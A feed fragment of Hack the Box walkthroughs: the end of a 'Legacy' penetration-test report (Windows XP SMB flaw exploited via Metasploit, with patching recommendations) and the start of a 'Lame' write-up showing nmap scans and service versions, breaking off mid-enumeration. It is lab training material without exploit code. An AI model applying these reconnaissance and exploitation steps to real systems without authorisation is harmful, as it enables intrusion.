srcset="https://substackcdn.com/image/fetch/$s_!QlQw!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 424w, https://substackcdn.com/image/fetch/$s_!QlQw!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 848w, https://substackcdn.com/image/fetch/$s_!QlQw!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 1272w, https://substackcdn.com/image/fetch/$s_!QlQw!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F14e46259-d762-4640-b180-f0b58bcedaac_800x280.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!vek0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!vek0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 424w, https://substackcdn.com/image/fetch/$s_!vek0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 848w, https://substackcdn.com/image/fetch/$s_!vek0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 1272w, https://substackcdn.com/image/fetch/$s_!vek0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!vek0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!vek0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 424w, https://substackcdn.com/image/fetch/$s_!vek0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 848w, https://substackcdn.com/image/fetch/$s_!vek0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 1272w, https://substackcdn.com/image/fetch/$s_!vek0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F0af417e8-6e38-449c-ab90-acb3bfde0778_800x241.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Whew, we&#8217;re done.</p><h3>Findings, Sample Code, and Flags</h3><p>Finding 1: The Legacy system is running Windows XP SP3, which is well beyond end of life (EOL).</p><p>Finding 2: The version of Windows XP running has a significant vulnerability in Server Message Block (SMB) that allows remote attackers to exploit the vulnerability and gain SYSTEM level access.</p><h3>Additional Actions</h3><p>None.</p><h3>High-Level Summary and Recommendations</h3><p>C_3PJoe (the adversary) was commissioned to perform a penetration test of the host Legacy (the victim) in an effort to see what vulnerabilities existed within the system and determine what paths to exploitation existed. Through using an out of date operating system (Windows XP), which all support was discontinued in 2014, the adversary was able to execute an exploit against a vulnerability in the Windows operating system to gain full SYSTEM access.</p><p>The adversary recommends implementing a verbose vulnerability management program to patch the operating systems and software on the systems. Furthermore, it is recommended that all software, particularly public-facing web servers use the latest stable release of available software.</p><p>Specific upgrades recommended are Microsoft Windows 10 or above.</p><h3>Tools Used</h3><p>nmap<br>smbclient<br>msfconsole ( Metasploit Framework)<br>SearchSploit</p><p>Other Walktroughs:</p><p><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-blue-7fe9eb09d15">Blue</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-lame-5cf414d1c523">Lame</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-write-up-arctic-50eccccc560">Arctic</a><br><a href="https://medium.com/@_C_3PJoe/htb-retired-box-walkthrough-mirai-83b22174f03b">Mirai</a></p>]]></content:encoded></item><item><title><![CDATA[HTB Retired Box Walkthrough: Lame]]></title><description><![CDATA[Lame is a retired Linux machine that is rated as Easy on Hack the Box.]]></description><link>https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-lame-5cf414d1c523</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-lame-5cf414d1c523</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Sat, 31 Aug 2019 05:57:11 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!C5iC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Lame is a retired Linux machine that is rated as Easy on Hack the Box.</p><blockquote><p><em>Hostname: Lame<br>IP: 10.10.10.3<br>Operating System: Linux</em></p></blockquote><h3>Port Scan Results*</h3><p>A simple nmap port scan <em>nmap -vvvvv 10.10.10.3 yields the following ports:</em></p><blockquote><p><em>21/tcp: ftp<br>22/tcp: ssh<br>139/tcp: netbios-ssn<br>445/tcp: microsoft-ds</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!C5iC!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!C5iC!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 424w, https://substackcdn.com/image/fetch/$s_!C5iC!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 848w, https://substackcdn.com/image/fetch/$s_!C5iC!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 1272w, https://substackcdn.com/image/fetch/$s_!C5iC!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!C5iC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!C5iC!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 424w, https://substackcdn.com/image/fetch/$s_!C5iC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 848w, https://substackcdn.com/image/fetch/$s_!C5iC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 1272w, https://substackcdn.com/image/fetch/$s_!C5iC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F67e80b63-bb6d-46fd-b0a5-f21f747612ac_800x441.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><h3>Further Enumeration*</h3><p>This initial port scan didn&#8217;t give us much. We need to approach this with a three-pronged attack. 1: amp up our nmap, 2: look at the actual website, and 3: go snooping through the directories.</p><p>For the next part of enumeration, I attempt a service version scan using nmap <em>nmap -vvvvvv -sTV 10.10.10.40.</em></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!0Dij!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!0Dij!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 424w, https://substackcdn.com/image/fetch/$s_!0Dij!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 848w, https://substackcdn.com/image/fetch/$s_!0Dij!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 1272w, https://substackcdn.com/image/fetch/$s_!0Dij!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!0Dij!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!0Dij!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 424w, https://substackcdn.com/image/fetch/$s_!0Dij!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 848w, https://substackcdn.com/image/fetch/$s_!0Dij!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 1272w, https://substackcdn.com/image/fetch/$s_!0Dij!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F206595f8-6bca-4986-9842-8e1f238ce9c3_800x495.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>That gave some service versions.</p><blockquote><p><em>21/tcp: ftp vsftpd 2.3.4<br>22/tcp: ssh OpenSSH 4.7p1 Debian 8ubutunu1 (protocol 2.0)<br>139/tcp: Samba smbd 3.x-4.x (Workgroup: WORKGROUP)<br>445/tcp: Samba smbd 3.x-4.x (Workgroup: WORKGROUP)</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!UuDu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!UuDu!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 424w, https://substackcdn.com/image/fetch/$s_!UuDu!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 848w, https://substackcdn.com/image/fetch/$s_!UuDu!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 1272w, https://substackcdn.com/image/fetch/$s_!UuDu!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!UuDu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!UuDu!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 424w, https://substackcdn.com/image/fetch/$s_!UuDu!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 848w, https://substackcdn.com/image/fetch/$s_!UuDu!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 1272w, https://substackcdn.com/image/fetch/$s_!UuDu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F259d9c47-b294-456c-b082-f146b8d5cdcf_800x322.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nope! Let&#8217;s check nmap FTP scripts and then SMB.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zrCz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zrCz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 424w, https://substackcdn.com/image/fetch/$s_!zrCz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 848w, https://substackcdn.com/image/fetch/$s_!zrCz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 1272w, https://substackcdn.com/image/fetch/$s_!zrCz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zrCz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!zrCz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 424w, https://substackcdn.com/image/fetch/$s_!zrCz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 848w, https://substackcdn.com/image/fetch/$s_!zrCz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 1272w, https://substackcdn.com/image/fetch/$s_!zrCz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F31c5a832-3241-4df0-8c50-d269f62ff442_800x178.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nothing by way of the FTP nmap scripts. On to SMB.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!nV4s!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!nV4s!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 424w, https://substackcdn.com/image/fetch/$s_!nV4s!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 848w, https://substackcdn.com/image/fetch/$s_!nV4s!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 1272w, https://substackcdn.com/image/fetch/$s_!nV4s!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!nV4s!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!nV4s!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 424w, https://substackcdn.com/image/fetch/$s_!nV4s!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 848w, https://substackcdn.com/image/fetch/$s_!nV4s!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 1272w, https://substackcdn.com/image/fetch/$s_!nV4s!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F5dd91442-8b65-4adc-acc7-e043ee0dd2ae_800x336.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Hmmmm&#8230;let&#8217;s do some nmap enumeration and come back to this. Let&#8217;s find out what nmap has in the scripting engine via <em>ls -la /usr/share/nmap/scripts | grep smb. </em><strong>Good Selection.</strong></p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" 